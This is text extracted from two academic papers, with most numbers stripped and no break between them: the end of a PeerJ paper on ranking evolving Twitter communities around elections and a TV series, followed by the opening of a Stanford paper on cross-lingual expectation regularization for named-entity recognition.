unfortunately cannot be illustrated in this manuscript due to space restrictions. however, a short list of non-mainstream findings is presented on table . one of the main anticipated characteristics of this particular set is that the news media, political analysts, politicians, even celebrities are heavily mentioned in the event of an election. greek election datasets the two greek elections of were held on january th and on september th and the collection of corresponding tweets was made using greek and english keywords, hashtags and user accounts of all major running parties and their leaders. although participation in the second election was almost cut in half with regard to the first, there are a few similarities in the dynamic communities that are of interest. the top dyccos of both datasets surfaced groups of an extremely wide and diverse background. groups from turkey, italy, spain and england anticipated syriza’s (center-left anti-austerity party) potential wins in both elections and joined in to comment on all matters such as the grexit, the future of the greek people, how the euro hit an year low following the victory of the anti-austerity party but also that the markets managed to shake off the initial tremors created by it. conspiracy tweets were also posted within a community mentioning operation gladio; a nato stay-behind operation during the cold war that sought to ensure communism was never able to gain a foothold in europe, which then evolved into sending warnings to the syriza party as greece was supposedly being framed as an emerging hub for terrorists. a short list of non-mainstream findings is presented on table . although there were a lot of interesting international pieces of commentary such as the above, the framework did not miss the local communities where a strong presence was achieved by the far-left supporters, the independent greeks supporters, and a slightly konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://goo.gl/oks u https://goo.gl/ybg z https://goo.gl/hgiaan https://goo.gl/fza ux https://goo.gl/ yefrp https://goo.gl/ydzd r http://dx.doi.org/ . /peerj-cs. milder presence from the right wing and extreme-right wing supporters all of whom were rooting for their party and pointing out the mistakes of the opposing ones. one of the similarities between the two election datasets which is rather impressive lies in the almost identical structure of the two evolutions as shown by the respective heatmaps in the evaluation section. it is also worth mentioning that many influential users (e.g., @avgerinosx, @freedybruna) and politicians (e.g., @panoskammenos, @niknikolopoulos) who were extremely active in the first election, were also present in the second one. data processing prior to the framework application, the network data is preprocessed as follows. initially, all interaction data is filtered by discarding any corrupt messages, tweets which do not contain any interaction information and all self-loops (self-mentions) since they most frequently correspond to accounts who are trying to manipulate their influence score on twitter. the filtered data is then sampled resulting in a sequence of activity-based snapshots. figure displays the mentioning activity of the four twitter networks. the process which puts the greatest computational burden on the framework involves the evolution detection. in order to speed up the searching operation, instead of using strings, the users’ names are hashed resulting in communities comprising sets of hashes. moreover, we discard all the users’ hashes which appear strictly in a single timeslot since they are considered temporal outliers. however, they are not discarded from the metadata container as they may provide useful information. two additional acceleration measures are: the discarding of communities with a population of less than three users, and, similarly to the scheme proposed by arasu, ganti & kaushik ( ), a size comparison check prior to the jaccard similarity calculation (i.e., if the size difference between the communities disallows a threshold overcome, there is no point in measuring their similarity). every community in every timeslot is used as a query in a maximum of d older timeslots, essentially searching for similar communities in a d+ timeslot window. whenever a similar community is found the search is halted and two possible scenarios take place. either a new dynamic community is initiated or the query is added to an already active dynamic community. each of these dynamic communities contains information such as text, hashtags, urls, user centralities and edges which are all stored in a dynamic community container (dycco). following the formation of these dyccos, a tf-idf procedure is applied in order to extract valuable keywords and bigrams that will pose as a dycco guideline for the potential user that might interest him/er more. the corpus of the dataset (idf) is created by using the unique set of words contained in each timeslot of every available dynamic community and the term frequency is computed by using the unique set of tweets within the community (i.e., only one of the repetitions is used in the case that the sentence was retweeted). for the purposes of better illustration and easier browsing, the products of the framework as seen in fig. consist of: • a word cloud per dynamic community containing the most popular: (a) hashtags, (b) keywords, (c) bigrams, (d) domains and (e) text items; konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure dycco structure and content illustration for the sherlock twitter dataset. (a) a color heatmap displaying the evolution of the top dynamic communities of bbc’s sherlock tv series dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens (the numbers on the right represent the label of each dynamic community). (b) wordclouds of the most popular keywords, bigrams, hashtags, tweets and urls acquired from community , timeslot . (c) the corresponding graphical illustration of community , timeslot under study. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure color heatmap displaying the evolution of the top dynamic communities of the us election dataset. each evolution series contains a characterization of the community based on the con- tained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens. • the ten most influential users from each community which could provide the potential journalist/analyst with new users who are worth following the color heatmap in the figure represents community size but can be adjusted to also give a comparative measure of centrality or density. by using this dycco containing framework, the user is provided with a more meaningful view of the most important communities as well as an insight to the evolving reaction of the public with respect to various events. the respective color heatmaps for the us election and the greek election datasets are presented in figs. – . evaluation while executing preliminary experiments it was concluded that the framework can undoubtedly provide the user with some useful information whether the query regarded politics, television series, specific events or even specific people/celebrities. unfortunately, there is no known method to which we can compare the performance of our framework. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure color heatmap displaying the evolution of the top dynamic communities of the january, greek election dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens. due to this predicament, we took the opportunity to introduce a content-based evaluation scheme through which we may compare the effectiveness of the proposed framework to the size-grounded ranking baseline method used in lu & brelsford ( ). since it is immensely difficult to evaluate community importance based on the tweets themselves, we employed amazon’s alexa service and the contained urls of each static community to extract the category to which it belonged. alexa requires a domain as input and returns a string of categories in a variety of languages to which it belongs. in order to avoid duplicates, categories in a language other than english were translated automatically using google’s translating service. unfortunately, most of the domains, even popular ones, either returned a vary vague category (e.g., internet) or none at all. hence, manual domain categorization was also necessary in order to include the most popular of domains. specifically, the urls we categorized using the following labels: television, video, photo, news, social networking, blog, conspiracy, personal sites, politics, shop, arts and spam. the dynamic communities of the three twitter datasets combined contained , urls which were reduced to , unique domains. a mere , of these domains were categorized either by alexa or manually, but the overall sample of categorized urls was konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure color heatmap displaying the evolution of the top dynamic communities of the septem- ber, greek election dataset. each evolution series contains a characterization of the community based on the contained urls. the background color varies between shades of blue and is an indication of the logged size of the specific community. the population increases as the shade darkens. significant enough to be used in the categorization process. the result of the most popular category for each community is shown in the color heatmaps displayed in figs. a and – for each dataset. besides the labeling, the heatmap also provides information regarding the size of the community. the darker the colors get, the larger the community. by combining the two, the user is provided with a relatively good idea of where to begin his/er search. the premise on which the evaluation is based is that the content of the top – dynamic communities’ content should match the category of the query similarly to a search engine, since most users will not go past these many results. for example, if the queried event concerns an election, the content of the top communities should match that of news, politics, conspiracies, etc. on the other hand, if it concerns a television series, it should contain videos, television and other opinion references (social networks), art (photos), shops where the series is available, etc. the content comparison as represented by the sum of all categories (where available) in the dynamic communities between the proposed and the baseline ranking methods is shown in fig. . the tisci method seems to either surpass or tie the baseline method in the categories of interest. the single centrality konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure content comparison between the proposed and the baseline ranking methods. results for the (a) sherlock series, (b) us election and (c) january greek election datasets. ranking method is used here as an indication to the fact that the proposed method performs well as a whole even when independent features do not. the secondary evaluation scheme explores the diversity fluctuation. greater diversity implies more infomation and therefore more useful results. employing the entropy feature described in the community ranking section but substituting bigrams for single words in order to increase the sense of diversity, we compute the mean bigram entropy for all timeslots in the top communities and compare the result of the proposed method to that of the baseline. figures – show the comparison between the two methods for all three datasets in which the proposed method seems to retrieve more diverse communities in most timeslots. table presents the total bigram entropy for all the timeslots for each dataset. with the exception of the greek election dataset in which the difference is quite small, the proposed method performs definitely better compared to the baseline. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the sherlock dataset. figure mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the us election dataset. konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure mean bigram entropy. comparison between the proposed and the lu & brelsford ( ) (size) ranking methods for the greek election dataset (january ). table total bigram entropy resulting from the proposed and baseline methods for all three datasets. sherlock us election greek election tisci . . . lu and brelsford . . . conclusions the paper presented a framework for the extraction of useful information from osn interactions. the basis of the framework is the study of the temporal structure and the monitoring of the evolution that the osn communities undergo over time. the contribution of the proposed method lies in the ranking of the detected dynamic communities in respect to structural, evolutionary and importance features. by ranking the communities, the corresponding metadata containers (dyccos) are also ranked, thus providing the user with popular urls, tweets and wordclouds of keywords and bigrams. the experimental analysis was based on three evolutionary networks extracted from user interactions in twitter. when applied on these networks, the framework uncovered a large number of dynamic communities with a variety of evolutionary characteristics. unfortunately, it also uncovered a lack in a groundtruth evaluation scheme. in order to fill this need, we proposed a content-based evaluation process which hopefully will motivate more research into this direction. the conducted experiments highlighted the potential of the proposed framework for discovering persistent, interesting users, newsworthy pieces of information and real-world incidents around topics of interest as well as a means to konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. follow a story over consecutive, or even non-consecutive, time-lapses. they also revealed the complexity of the analysis and evaluation processes due to the large scale of data to be analyzed and the absence of real ground truth data which the area of dynamic community detection and ranking clearly lacks. future work will involve fitting the framework with a community detection method that allows overlapping, the implementation of a better means of presentation than wordclouds and heatmaps, the discovery of a non-heuristic way of selecting the sampling time and the employing of local sensitivity hashing to further speed up the evolution detection procedure. additional information and declarations funding all the funding received during this study was provided by the step h project, funded by the european commission (under grant agreement ), the reveal fp project, funded by the european commission (under contract number fp - ), and the socialsensor fp project funded by the ec under contract number . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european commission: , fp - . competing interests the authors declare there are no competing interests. author contributions • konstantinos konstantinidis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • symeon papadopoulos conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • yiannis kompatsiaris reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/dinos /peerjdynamiccommunityranking. references aiello l, petkos g, martin c, corney d, papadopoulos s, skraba r, goker a, kom- patsiaris i, jaimes a. . sensing trending topics in twitter. multimedia, ieee transactions on ( ): – doi . /tmm. . . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/dinos /peerjdynamiccommunityranking http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. aktunc r, toroslu ih, ozer m, davulcu h. . a dynamic modularity based commu- nity detection algorithm for large-scale networks: dslm. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining . new york: acm, – . albano a, guillaume j-l, le grand b. . on the use of intrinsic time scale for dynamic community detection in social networks. in: proceedings of the ieee th international conference on research challenges in information science. piscataway, – . alvarez aj, sanz-rodríguez ce, cabrera jl. . weighting dissimilarities to detect communities in networks. philosophical transactions of the royal society a: math- ematical, physical and engineering sciences epub ahead of print november doi . /rsta. . . arasu a, ganti v, kaushik r. . efficient exact set-similarity joins. in: proceedings of the nd international conference on very large data bases, vldb ’ . vldb endowment, – . asur s, parthasarathy s, ucar d. . an event-based framework for characterizing the evolutionary behavior of interaction graphs. in: berkhin p, caruana r, wu x, eds. kdd. new york: acm, – . berberich k, bedathur s, weikum g, vazirgiannis m. . comparing apples and oranges: normalized pagerank for evolving graphs. in: proceedings of the th international conference on world wide web. new york: acm, – . blondel vd, guillaume j-l, lambiotte r, lefebvre e. . fast unfolding of com- munities in large networks. journal of statistical mechanics: theory and experiment ( ):p ( pp). brin s, page l. . the anatomy of a large-scale hypertextual web search engine. computer networks and isdn systems ( – ): – doi . /s - ( ) -x. cazabet r, amblard f. . dynamic community detection, chapter d. in: alhajj r, rokne j, eds. encyclopedia of social network analysis and mining. new york: springer new york, – . cazabet r, takeda h, hamasaki m, amblard f. . using dynamic community detection to identify trends in user-generated content. social network analysis and mining ( ): – doi . /s - - - . cormack gv, clarke cla, buettcher s. . reciprocal rank fusion outperforms condorcet and individual rank learning methods. in: proceedings of the nd international acm sigir conference on research and development in information retrieval, sigir ’ . new york: acm, – . ferlez j, faloutsos c, leskovec j, mladenic d, grobelnik m. . monitoring network evolution using mdl. in: proceedings of the ieee th international conference on data engineering, icde ’ . piscataway: ieee computer society, – . fortunato s. . community detection in graphs. physics reports ( – ): – doi . /j.physrep. . . . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.physrep. . . http://dx.doi.org/ . /peerj-cs. gauvin l, panisson a, cattuto c. . detecting the community structure and activity patterns of temporal networks: a non-negative tensor factorization approach. plos one ( ): doi . /journal.pone. . giatsoglou m, chatzakou d, vakali a. . community detection in social media by leveraging interactions and intensities. in: lin x, manolopoulos y, srivastava d, huang g, eds. web information systems engineering wise . lecture notes in computer science, vol. . berlin heidelberg: springer, – . giatsoglou m, vakali a. . capturing social data evolution using graph clustering. ieee internet computing ( ): – . granell c, darst rk, arenas a, fortunato s, gómez s. . benchmark model to assess community structure in evolving networks. physical review e : doi . /physreve. . . greene d, doyle d, cunningham p. . tracking the evolution of communities in dynamic social networks. in: memon n, alhajj r, eds. asonam. piscataway: ieee computer society, – . gupta p, goel a, lin j, sharma a, wang d, zadeh r. . wtf: the who to follow service at twitter. in: proceedings of the nd international conference on world wide web. republic and canton of geneva: international world wide web conferences steering committee, – . jaccard p. . the distribution of the flora in the alpine zone. new phytologist ( ): – doi . /j. - . .tb .x. kim y, shim k. . twilite: a recommendation system for twitter using a proba- bilistic model based on latent dirichlet allocation. information systems : – doi . /j.is. . . . konstantinidis k, papadopoulos s, kompatsiaris y. . community structure and evolution analysis of osn interactions around real-world social phenomena. in: proceedings of the th panhellenic conference on informatics, pci ’ . new york: acm, – . lancichinetti a, fortunato s. . community detection algorithms: a comparative analysis. physical review e : doi . /physreve. . . lazer d, pentland a, adamic l, aral s, barabási a-l, brewer d, christakis n, contractor n, fowler j, gutmann m, jebara t, king g, macy m, roy d, van alstyne m. . computational social science. science ( ): – doi . /science. . leskovec j, lang kj, mahoney m. . empirical comparison of algorithms for network community detection. in: proceedings of the th international conference on world wide web, www ’ . new york: acm, – . lin y-r, sundaram h, kelliher a. . summarization of social activity over time: people, actions and concepts in dynamic networks. in: proceedings of the th acm conference on information and knowledge management, cikm ’ . new york: acm, – . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.is. . . http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. lu x, brelsford c. . network structure and community evolution on twitter: human behavior change in response to the japanese earthquake and tsunami. scientific reports : – . marcus a, bernstein m, badar o, karger d, madden s, miller r. . twitinfo: aggregating and visualizing microblogs for event exploration. in: proceedings of the annual conference on human factors in computing systems. acm, – . mckelvey k, rudnick a, conover m, menczer f. . visualizing communication on social media: making big data accessible. in: proc. cscw ’ workshop on collective intelligence as community discourse and action. – . mucha pj, richardson t, macon k, porter ma, onnela j-p. . community structure in time-dependent, multiscale, and multiplex networks. science ( ): – doi . /science. . newman mej. . finding community structure in networks using the eigenvectors of matrices. physical review e : doi . /physreve. . . nguyen np, dinh tn, shen y, thai mt. . dynamic social community detection and its applications. plos one ( ): – doi . /journal.pone. . nikolov d, oliveira dfm, flammini a, menczer f. . measuring online social bubbles. peerj computer science :e doi . /peerj-cs. . palla g, barabasi a-l, vicsek t. . quantifying social group evolution. nature : – doi . /nature . papadopoulos s, kompatsiaris y, vakali a, spyridonos p. . community detection in social media–performance and application considerations. data mining knowl- edge discovery ( ): – doi . /s - - -z. qu q, liu s, jensen cs, zhu f, faloutsos c. . interestingness-driven diffusion process summarization in dynamic networks. in: calders t, esposito f, hüllermeier e, meo r, eds. machine learning and knowledge discovery in databases: european conference, ecml pkdd , nancy, france, september – , . proceedings, part ii, chapter . berlin, heidelberg: springer berlin heidelberg, – . rea mc. . the problem of material constitution. philosophical review ( ) – doi . / . rosvall m, axelsson d, bergstrom ct. . the map equation. the european physical journal special topics ( ): – doi . /epjst/e - - . rosvall m, bergstrom ct. . maps of random walks on complex networks reveal community structure. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . roy chowdhury n, sukumar s. . persistence based analysis of consensus protocols for dynamic graph networks. in: control conference (ecc), european. – . schinas m, papadopoulos s, kompatsiaris y, mitkas pa. . visual event summariza- tion on social media using topic modelling and graph-based ranking algorithms. in: proceedings of the th acm on international conference on multimedia retrieval. new york: acm, – . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /science. http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / http://dx.doi.org/ . /epjst/e - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. sørensen t. . a method of establishing groups of equal amplitude in plant sociology based on similarity of species and its application to analyses of the vegetation on danish commons. biologiske skrifter : – . takaffoli m, sangi f, fagnan j, zaïane or. . community evolution mining in dynamic social networks. procedia—social and behavioral sciences ( ): – doi . /j.sbspro. . . . tantipathananandh c, berger-wolf t, kempe d. . a framework for community identification in dynamic social networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, kdd ’ . new york: acm, – . topirceanu a, udrescu m, vladutiu m, marculescu r. . tolerance-based inter- action: a new model targeting opinion formation and diffusion in social networks. peerj computer science :e doi . /peerj-cs. . volkovs mn, larochelle h, zemel rs. . learning to rank by aggregating expert preferences. in: proceedings of the st acm international conference on information and knowledge management, cikm ’ . new york: acm, – . wei w, joseph k, liu h, carley km. . the fragility of twitter social networks against suspended users. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining , asonam ’ . new york: acm, – . williams sa, terras mm, warwick c. . what do people study when they study twitter? classifying twitter related academic papers. journal of documentation ( ): – doi . /jd- - - . xiao d, du n, wu b, wang b. . community ranking in social network. computer and computational sciences, international multi-symposiums on : – . yang j, mcauley jj, leskovec j. . community detection in networks with node attributes. in: ieee th international conference on data mining, dallas, tx, usa, december – , . piscataway: ieee, – . konstantinidis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.sbspro. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /jd- - - http://dx.doi.org/ . /peerj-cs. cross-lingual projected expectation regularization for weakly supervised learning cross-lingual projected expectation regularization for weakly supervised learning mengqiu wang and christopher d. manning computer science department stanford university stanford, ca usa {mengqiu,manning}@cs.stanford.edu abstract we consider a multilingual weakly supervised learning scenario where knowledge from an- notated corpora in a resource-rich language is transferred via bitext to guide the learning in other languages. past approaches project labels across bitext and use them as features or gold labels for training. we propose a new method that projects model expectations rather than labels, which facilities transfer of model uncertainty across language bound- aries. we encode expectations as constraints and train a discriminative crf model using generalized expectation criteria (mann and mccallum, ). evaluated on standard chinese-english and german-english ner datasets, our method demonstrates f scores of % and % when no labeled data is used. attaining the same accuracy with su- pervised crfs requires k and . k labeled sentences. furthermore, when combined with labeled examples, our method yields signifi- cant improvements over state-of-the-art super- vised methods, achieving best reported num- bers to date on chinese ontonotes and ger- man conll- datasets. introduction supervised statistical learning methods have en- joyed great popularity in natural language process- ing (nlp) over the past decade. the success of su- pervised methods depends heavily upon the avail- ability of large amounts of annotated training data. manual curation of annotated corpora is a costly and time consuming process. to date, most annotated re- sources resides within the english language, which hinders the adoption of supervised learning methods in many multilingual environments. to minimize the need for annotation, significant progress has been made in developing unsupervised and semi-supervised approaches to nlp (collins and singer ; klein ; liang ; smith ; goldberg ; inter alia) . more recent paradigms for semi-supervised learning allow mod- elers to directly encode knowledge about the task and the domain as constraints to guide learning (chang et al., ; mann and mccallum, ; ganchev et al., ). however, in a multilingual setting, coming up with effective constraints require extensive knowledge of the foreign language. bilingual parallel text (bitext) lends itself as a medium to transfer knowledge from a resource-rich language to a foreign languages. yarowsky and ngai ( ) project labels produced by an english tag- ger to the foreign side of bitext, then use the pro- jected labels to learn a hmm model. more recent work applied the projection-based approach to more language-pairs, and further improved performance through the use of type-level constraints from tag dictionary and feature-rich generative or discrimina- tive models (das and petrov, ; täckström et al., ). in our work, we propose a new projection-based method that differs in two important ways. first, we never explicitly project the labels. instead, we project expectations over the labels. this projection for experimental purposes, we designate english as the resource-rich language, and other languages of interest as “for- eign”. in our experiments, we simulate the resource-poor sce- nario using chinese and german, even though in reality these two languages are quite rich in resources. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. acts as a soft constraint over the labels, which al- lows us to transfer more information and uncertainty across language boundaries. secondly, we encode the expectations as constraints and train a model by minimizing divergence between model expectations and projected expectations in a generalized expec- tation (ge) criteria (mann and mccallum, ) framework. we evaluate our approach on named entity recognition (ner) tasks for english-chinese and english-german language pairs on standard public datasets. we report results in two settings: a weakly supervised setting where no labeled data or a small amount of labeled data is available, and a semi- supervised settings where labeled data is available, but we can gain predictive power by learning from unlabeled bitext. related work most semi-supervised learning approaches embody the principle of learning from constraints. there are two broad categories of constraints: multi-view con- straints, and external knowledge constraints. examples of methods that explore multi-view constraints include self-training (yarowsky, ; mcclosky et al., ), co-training (blum and mitchell, ; sindhwani et al., ), multi- view learning (ando and zhang, ; carlson et al., ), and discriminative and generative model combination (suzuki and isozaki, ; druck and mccallum, ). an early example of using knowledge as con- straints in weakly-supervised learning is the work by collins and singer ( ). they showed that the addition of a small set of “seed” rules greatly im- prove a co-training style unsupervised tagger. chang et al. ( ) proposed a constraint-driven learning (codl) framework where constraints are used to guide the selection of best self-labeled examples to be included as additional training data in an iterative em-style procedure. the kind of constraints used in applications such as ner are the ones like “the words ca, australia, ny are location” (chang et al., ). notice the similarity of this partic- a multi-view interpretation of self-training is that the self- tagged additional data offers new views to learners trained on existing labeled data. ular constraint to the kinds of features one would expect to see in a discriminative maxent model. the difference is that instead of learning the valid- ity (or weight) of this feature from labeled exam- ples — since we do not have them — we can con- strain the model using our knowledge of the domain. druck et al. ( ) also demonstrated that in an ac- tive learning setting where annotation budget is lim- ited, it is more efficient to label features than ex- amples. other sources of knowledge include lexi- cons and gazetteers (druck et al., ; chang et al., ). while it is straight-forward to see how resources such as a list of city names can give a lot of mileage in recognizing locations, we are also exposed to the danger of over-committing to hard constraints. for example, it becomes problematic with city names that are ambiguous, such as augusta, georgia. to soften these constraints, mann and mccallum ( ) proposed the generalized expectation (ge) criteria framework, which encodes constraints as a regularization term over some score function that measures the divergence between the model’s ex- pectation and the target expectation. the connection between ge and codl is analogous to the relation- ship between hard (viterbi) em and soft em, as il- lustrated by samdani et al. ( ). another closely related work is the posterior regularization (pr) framework by ganchev et al. ( ). in fact, as bellare et al. ( ) have shown, in a discriminative model these two methods opti- mize exactly the same objective. the two differ in optimization details: pr uses a em algorithm to approximate the gradients which avoids the ex- pensive computation of a covariance matrix between features and constraints, whereas ge directly cal- culates the gradient. however, later results (druck, ) have shown that using the expectation semir- ing techniques of li and eisner ( ), one can compute the exact gradients of ge in a conditional random fields (crf) (lafferty et al., ) at costs this is a city in the state of georgia in usa, famous for its golf courses. it is ambiguous since both augusta and georgia can also be used as person names. the different terminology employed by ge and pr may be confusing to discerning readers, but the “expectation” in the context of ge means the same thing as “marginal posterior” as in pr. no greater than computing the gradients of ordinary crf. and empirically, ge tends to perform more ac- curately than pr (bellare et al., ; druck, ). obtaining appropriate knowledge resources for constructing constraints remain as a bottleneck in applying ge and pr to new languages. however, a number of past work recognizes parallel bitext as a rich source of linguistic constraints, naturally cap- tured in the translations. as a result, bitext has been effectively utilized for unsupervised multilin- gual grammar induction (alshawi et al., ; sny- der et al., ), parsing (burkett and klein, ), and sequence labeling (naseem et al., ). a number of recent work also explored bilin- gual constraints in the context of simultaneous bilin- gual tagging, and showed that enforcing agreements between language pairs give superior results than monolingual tagging (burkett et al., ; che et al., ; wang et al., a). burkett et al. ( ) also demonstrated a uptraining (petrov et al., ) setting where tag-induced bitext can be used as ad- ditional monolingual training data to improve mono- lingual taggers. a major drawback of this approach is that it requires a readily-trained tagging models in each languages, which makes a weakly supervised setting infeasible. another intricacy of this approach is that it only works when the two models have com- parable strength, since mutual agreements are en- forced between them. projection-based methods can be very effective in weakly-supervised scenarios, as demonstrated by yarowsky and ngai ( ), and xi and hwa ( ). one problem with projected labels is that they are often too noisy to be directly used as training sig- nals. to mitigate this problem, das and petrov ( ) designed a label propagation method to au- tomatically induce a tag lexicon for the foreign lan- guage to smooth the projected labels. fossum and abney ( ) filter out projection noise by com- bining projections from from multiple source lan- guages. however, this approach is not always viable since it relies on having parallel bitext from multi- ple source languages. li et al. ( ) proposed the use of crowd-sourced wiktionary as additional re- sources for inducing tag lexicons. more recently, täckström et al. ( ) combined token-level and type-level constraints to constrain legitimate label sequences and and recalibrate the probability distri- bution in a crf. the tag dictionary used for pos tagging are analogous to the gazetteers and name lexicons used for ner by chang et al. ( ). our work is also closely related to ganchev et al. ( ). they used a two-step projection method similar to das and petrov ( ) for dependency parsing. instead of using the projected linguis- tic structures as ground truth (yarowsky and ngai, ), or as features in a generative model (das and petrov, ), they used them as constraints in a pr framework. our work differs by project- ing expectations rather than viterbi one-best labels. we also choose the ge framework over pr. experi- ments in bellare et al. ( ) and druck ( ) sug- gest that in a discriminative model (like ours), ge is more accurate than pr. more recently, ganchev and das ( ) further extended this line of work to directly train discriminative sequence models us- ing cross lingual projection with pr. the types of constraints applied in this new work are similar to the ones in the monolingual pr setting proposed by ganchev et al. ( ), where the total counts of la- bels of a particular kind are expected to match some fraction of the projected total counts. our work dif- fer in that we enforce expectation constraints at to- ken level, which gives tighter guidance to learning the model. approach given bitext between english and a foreign lan- guage, our goal is to learn a crf model in the foreign language from little or no labeled data. our method performs cross-lingual projected expectation regularization (cliper). for every aligned sentence pair in the bitext, we first compute the posterior marginal at each word po- sition on the english side using a pre-trained english crf tagger; then for each aligned english word, we project its posterior marginal as expectations to the aligned word position on the foreign side. figure shows a snippet of a sentence from real corpus. no- tice that if we were to directly project the viterbi best assignment from english to chinese, all three chinese words that are named entities would have gotten the wrong tags. but projecting the english crf model expectations preserves some uncertain- ties, informing the chinese model that there is a % a reception in luobu linka . . . . . . met with representatives of zhongguo ribao o: . o: . gpe: . gpe: . per: . per: . per: . gpe: . gpe: . loc: . loc: . gpe: . gpe: . gpe: . org: . org: . o: . o: . org: . org: . org: . loc: . loc: . org: . org: . loc: . loc: . loc: . per: . per: . per: . per: . o: . o: . o: . 在 罗布林卡 举行 的 招待会 . . . . . . 会见 了 中国 日报 代表 per: . per: . per: . o: . o: . o: . loc: . org: . org: . loc: . loc: . loc: . org: . o: . o: . org: . org: . org: . gpe: . loc: . loc: . gpe: . gpe: . gpe: . o: . gpe: . gpe: . per: . per: . per: . figure : diagram illustrating the projection of model expectation from english to chinese. the posterior probabilities assigned by the english crf model is shown above each english word; automatically induced word alignments are shown in red; the correct projected labels for chinese words are shown in green, and incorrect labels are shown in red. chance that “中国日报” (china daily) is an organi- zation in this context. we would like to learn a crf model in the for- eign language that has similar expectations as the projected expectations from english. to this end, we adopt the generalized expectation (ge) crite- ria framework introduced by mann and mccallum ( ). in the remainder of this section, we follow the notation used in (druck, ) to explain our ap- proach. . cliper the general idea of ge is that we can express our preferences over models through constraint func- tions. a desired model should satisfy the imposed constraints by matching the expectations on these constraint functions with some target expectations (attained by external knowledge like lexicons or in our case transferred knowledge from english). we define a constraint function φi,lj for each word po- sition i and output label assignment lj. φi,lj = is a constraint in that position i cannot take label lj. the set {l , · · · , lm} denotes all possible label as- signment for each yi, and m is number of label val- ues. ai is the set of english words aligned to chi- nese word i. φi,lj are defined for all position i such that ai = ∅. in other words, the constraint function applies only to chinese word positions that have at least one aligned english word. each φi,lj (y) can be treated as a bernoulli random variable, and we concatenate the set of all φi,lj into a random vector φ(y), where φk = φi,lj if k = i∗m + j. we drop the (y) in φ for simplicity. the target expectation over φi,lj , denoted as φ̃i,lj , is the expectation of assigning label lj to english word ai under the english conditional probability model. when multiple english words are aligned to the same foreign word, we average the expectations. the expectation over φ under a conditional prob- ability model p(y|x; θ) is denoted as ep(y|x;θ)[φ], and simplified as eθ[φ] whenever it is unambigu- ous. the conditional probability model p(y|x; θ) in our case is defined as a standard linear-chain crf: p(y|x; θ) = z(x; θ) exp ( n∑ i θf(x,yi,yi− ) ) where f is a set of feature functions; θ are the match- ing parameters to learn; n = |x|. the objective function to maximize in a standard crf is the log probability over a collection of la- beled documents: lcrf (θ) = a′∑ a= log p(y∗a|xa; θ) ( ) a′ is the number of labeled sentences. y∗ is an ob- served label sequence. the objective function to maximize in ge is de- fined as the sum over all unlabeled examples on the we simplify notation by dropping the l regularizer in the crf definition, but apply it in our experiments. foreign side of bitext, denoted as xb, over some cost function s between the model expectation over φ (eθ[φ]) and the target expectation (φ̃). we choose s to be the negative l squared error sum defined as: lge(θ) = n′∑ b= s ( ep(yb|xb;θ)[φ(yb)],φ̃b ) = n′∑ b= −‖φ̃b −eθ[φ(yb)]‖ ( ) n′ is the total number of unlabeled bitext sentence pairs. when both labeled and bitext training data are available, the joint objective is the sum of eqn. and . each is computed over the labeled training data and foreign half in the bitext, respectively. we can optimize this joint objective by comput- ing the gradients and use a gradient-based optimiza- tion method such as l-bfgs. gradients of lcrf decomposes down to the gradients over each la- beled training example (x,y∗). computing the gra- dient of lge decomposes down to the 